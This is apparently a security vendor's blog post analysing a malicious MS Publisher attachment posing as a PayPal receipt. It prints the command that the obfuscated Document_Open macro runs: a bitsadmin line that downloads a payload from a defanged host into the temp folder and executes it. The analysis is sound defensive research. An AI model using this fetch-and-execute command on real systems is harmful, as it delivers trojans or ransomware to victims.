Blog

Analyzing Malware Embedded in MS Publisher Files

We have started to see malware authors use embedded Visual Basic (VBA) macros in many unconventional file types to attack hosts. In response to this trend, VMRay Analyzer V 2.0 now supports the analysis of Microsoft Access and Microsoft Publisher files. Support for analysis of new sample types means greater coverage of an attack surface which in turn equals greater detection capability.

In this post, we review the analysis of a Publisher file associated with an email from service@paypal.com. The attached file (shown in Figure 1) is disguised as a payment receipt and is titled “FD-Rechnung.pub”.

Malicious Publisher Attachment
Figure 1: Email with the malicious MS Publisher attachment

Analysis

We first drag and drop the email attachment into the VMRay Cloud where it is immediately recognized as a ‘Microsoft Publisher Document’. On completing the analysis, VMRay Analyzer assigns a severity label of ‘Malicious’ to the sample (Figure 2).

Malicious Publisher Severity Score
Figure 2: ‘Sample view’ screen showing sample type and severity

A look at the Overview shows an unusual process tree (See Figure 3). Normally the Microsoft Publisher application (mspub.exe) opens the document and is the only associated process. However in this case, several other processes are invoked.

Figure 3: Unusual Process Tree

After opening the document the following command is executed:

cmd.exe /c bitsadmin /transfer myjob /download
/priority FOREGROUND "hxxp://www.doorasope.top/read.php?f=1.gif"
"%temp%\ltesih.jpg" >nul & "%temp%\ltesih.jpg" & exit

This command is hidden and embedded in the Publisher document as a VBA Macro which is highly obfuscated and normally hard to extract. Figure 4 shows the macro triggering the function “Document_Open()” when the document is opened.

Malicious Publisher File Obfuscated VBA Macro
Figure 4: Highly obfuscated VBA macro embedded in the sample

Since VMRay Analyzer monitors every process, we can extract and see the command that is executed after opening the document (Figure 5). The bitsadmin tool from Microsoft is used to download a file, copy it into the Windows temporary folder and then execute it. The downloaded file can be a Trojan or Ransomware or any other malicious file that the malware author wants to use in the attack. In this analysis, the downloaded file is very likely a Trojan/Bot that first connects to multiple C&C’s (command and control servers).

Malicious Publisher File Remote Host
Figure 5: Network view showing sample file’s connection to remote hosts

Conclusion

The choice of the Microsoft Publisher file format may not be the most popular for malware authors but it shows that no file format can be considered safe and free of malicious content. Malware detection and analysis solutions need to ensure that they offer greater coverage area of the attack surface by supporting these sample types.

In this analysis, the VTI Score (shown in Figure 6) shows that the Publisher document executes Visual Basic, creates processes and drops files to the system – all of which constitutes suspicious behavior.

Malicious Publisher File VTI Score
Figure 6: VTI Score

Malware authors use several methods to try and evade detection and analysis systems. Using lesser known or infrequently used file types is one such technique. However, the research team at VMRay is ready to deal with these evasion techniques.

View the Full Analysis Report